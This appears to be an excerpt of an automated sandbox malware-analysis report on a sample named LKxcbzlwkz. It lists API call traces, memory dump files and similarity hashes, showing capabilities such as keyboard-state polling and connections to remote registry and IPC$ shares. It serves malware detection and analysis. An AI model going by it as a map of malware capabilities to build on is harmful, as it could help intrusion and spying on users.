• Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
• Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
• LoadStringW.USER32(00000000), ref: 00454040
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• _wprintf.LIBCMT ref: 00454074
• __swprintf.LIBCMT ref: 004540A3
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 455036304-4153970271
• Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
• Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
• Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
• Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
APIs
• SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
• SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
• SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
• _memmove.LIBCMT ref: 00467EB8
• SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
• SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
• _memmove.LIBCMT ref: 00467F6C
• SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
• SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
• SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
• String ID:
• API String ID: 2170234536-0
APIs
• GetKeyboardState.USER32(?), ref: 00453CE0
• SetKeyboardState.USER32(?), ref: 00453D3B
• GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
• GetKeyState.USER32(000000A0), ref: 00453D75
• GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
• GetKeyState.USER32(000000A1), ref: 00453DB5
• GetAsyncKeyState.USER32(00000011), ref: 00453DE1
• GetKeyState.USER32(00000011), ref: 00453DEF
• GetAsyncKeyState.USER32(00000012), ref: 00453E18
• GetKeyState.USER32(00000012), ref: 00453E26
• GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
• GetKeyState.USER32(0000005B), ref: 00453E5D
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
• GetDlgItem.USER32(?,00000001), ref: 004357DB
• GetWindowRect.USER32(00000000,?), ref: 004357ED
• MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
• GetDlgItem.USER32(?,00000002), ref: 0043586A
• GetWindowRect.USER32(00000000,?), ref: 0043587C
• MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
• GetDlgItem.USER32(?,000003E9), ref: 004358DC
• GetWindowRect.USER32(00000000,?), ref: 004358EE
• MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
• GetDlgItem.USER32(?,000003EA), ref: 00435941
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
• InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
APIs
• GetWindowLongW.USER32(?,000000F0), ref: 004714DC
• LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
• SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
• DeleteObject.GDI32(?), ref: 0047151E
• DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
• SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
• ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
• DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
• SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
• DeleteObject.GDI32(?), ref: 004715EA
• DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3218148540-0
                                                                                                                                                                                                                                                            • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                                                                                                                                                            • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 136442275-0
                                                                                                                                                                                                                                                            • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                                                                                                                                                            • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00467490
                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                                                                                                                                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                                                            • _wcstok.LIBCMT ref: 004674FF
                                                                                                                                                                                                                                                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                                                                                                                                                            • _wcstok.LIBCMT ref: 004675B2
                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00467793
                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00467641
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 004677BD
                                                                                                                                                                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                                                                                                                                                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                                                                                                                                                            • String ID: X
                                                                                                                                                                                                                                                            • API String ID: 3104067586-3081909835
                                                                                                                                                                                                                                                            • Opcode ID: b68abb8f803176e9b7dbe847da29e758ec7e9b5067a266dcb368a43c8e18a4a8
                                                                                                                                                                                                                                                            • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b68abb8f803176e9b7dbe847da29e758ec7e9b5067a266dcb368a43c8e18a4a8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0046CDB0
                                                                                                                                                                                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                                                                                                                                                                                            • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                                                                                                                                                                              • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                                                                                                                                                                              • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                                                                                                                                                                              • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
• String ID: NULL Pointer assignment
• API String ID: 440038798-2785691316
• Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
• Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
• Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
• Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 00461056
• GetWindowTextW.USER32(?,?,00000400), ref: 00461092
• _wcslen.LIBCMT ref: 004610A3
• CharUpperBuffW.USER32(?,00000000), ref: 004610B1
• GetClassNameW.USER32(?,?,00000400), ref: 00461124
• GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
• GetClassNameW.USER32(?,?,00000400), ref: 004611A1
• GetClassNameW.USER32(?,?,00000400), ref: 004611D9
• GetWindowRect.USER32(?,?), ref: 00461248
  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
• String ID: ThumbnailClass
• API String ID: 4136854206-1241985126
• Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
• Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
• Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
• Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
APIs
• ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
• SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
• SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
• GetClientRect.USER32(?,?), ref: 00471A1A
• RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
• DestroyIcon.USER32(?), ref: 00471AF4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
• String ID: 2
• API String ID: 1331449709-450215437
• Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
• Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
• Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
• Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
APIs
• GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
• __swprintf.LIBCMT ref: 00460915
• __swprintf.LIBCMT ref: 0046092D
• _wprintf.LIBCMT ref: 004609E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
• API String ID: 3054410614-2561132961
• Opcode ID: 525672c6318f03bf5c80d6cc28fa1f1d99bb47d67e8ddb41e80830938e70613e
• Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
• Opcode Fuzzy Hash: 525672c6318f03bf5c80d6cc28fa1f1d99bb47d67e8ddb41e80830938e70613e
• Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 600699880-22481851
• Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
• Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
• Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
• Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: DestroyWindow
• String ID: static
• API String ID: 3375834691-2160076837
• Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
• Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
• Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
• Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D959
• GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
• API String ID: 2907320926-3566645568
• Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
• Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
• Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
• Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
APIs
  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
• DestroyAcceleratorTable.USER32(?), ref: 0047094A
• ImageList_Destroy.COMCTL32(?), ref: 004709AD
• ImageList_Destroy.COMCTL32(?), ref: 004709C5
• ImageList_Destroy.COMCTL32(?), ref: 004709D5
• DeleteObject.GDI32(?), ref: 00470A04
• DestroyIcon.USER32(?), ref: 00470A1C
• DeleteObject.GDI32(?), ref: 00470A34
• DestroyWindow.USER32(?), ref: 00470A4C
• DestroyIcon.USER32(?), ref: 00470A73
• DestroyIcon.USER32(?), ref: 00470A81
• KillTimer.USER32(00000000,00000000), ref: 00470B00
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
• String ID:
• API String ID: 1237572874-0
• Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
• Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
• Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
• Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
• SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
• VariantInit.OLEAUT32(?), ref: 004793E1
• SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
• VariantCopy.OLEAUT32(?,?), ref: 00479461
• SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
• VariantClear.OLEAUT32(?), ref: 00479489
• SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
• SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
• VariantClear.OLEAUT32(?), ref: 004794CA
• SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
